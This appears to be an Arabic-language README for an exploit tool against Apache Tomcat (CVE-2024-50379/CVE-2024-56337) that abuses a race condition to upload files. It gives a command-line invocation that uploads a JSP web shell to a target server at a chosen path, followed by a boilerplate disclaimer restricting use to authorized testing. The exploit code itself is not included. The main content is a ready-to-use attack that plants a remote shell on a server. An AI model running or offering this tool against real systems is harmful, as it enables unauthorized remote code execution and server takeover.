
tomcat CVE-2024-50379/CVE-2024-56337 إكسبلويت رفع الملفات عبر حالة تسابق
الاستغلال اليدوي مزعج، لذا أعددتُ exp..
طريقة الاستخدام:
shell.jsp هو ملف الشل، و ggsl.jsp هو الاسم/المسار المحفوظ على الخادم الهدف
./CVE-2024-50379 -u http://192.168.2.245:8080 -f shell.jsp -p ggsl.jsp


هذه الأداة مخصصة فقط لأنشطة بناء أمن المؤسسات المصرح بها قانونًا. إذا كنت بحاجة إلى اختبار قابلية استخدام هذه الأداة، فيرجى تجهيز بيئة الآلة المستهدفة بنفسك.
عند استخدام هذه الأداة للفحص، يجب عليك التأكد من أن هذا السلوك يتوافق مع القوانين واللوائح المحلية وأنك حصلت على التفويض الكافي. يرجى عدم مسح الأهداف غير المصرح بها.
إذا قمت بأي سلوك غير قانوني أثناء استخدام هذه الأداة، فستتحمل العواقب المقابلة بنفسك، ولن نتحمل أي مسؤولية قانونية أو تضامنية.
قبل تثبيت واستخدام هذه الأداة، يرجى القراءة المتأنية والفهم الكامل لمحتوى جميع البنود. قد يتم تمييز بنود التقييد والإخلاء من المسؤولية أو أي بنود أخرى تتعلق بحقوقك الجوهرية بخط عريض أو تسطير أو أشكال أخرى للفت انتباهك. ما لم تكن قد قرأت وفهمت وقبلت جميع بنود هذه الاتفاقية بالكامل، فيرجى عدم تثبيت واستخدام هذه الأداة. استخدامك لهذه الأداة أو قبولك لهذه الاتفاقية بأي طريقة أخرى صريحة أو ضمنية يُعتبر بمثابة قراءتك وموافقتك على الالتزام بهذه الاتفاقية.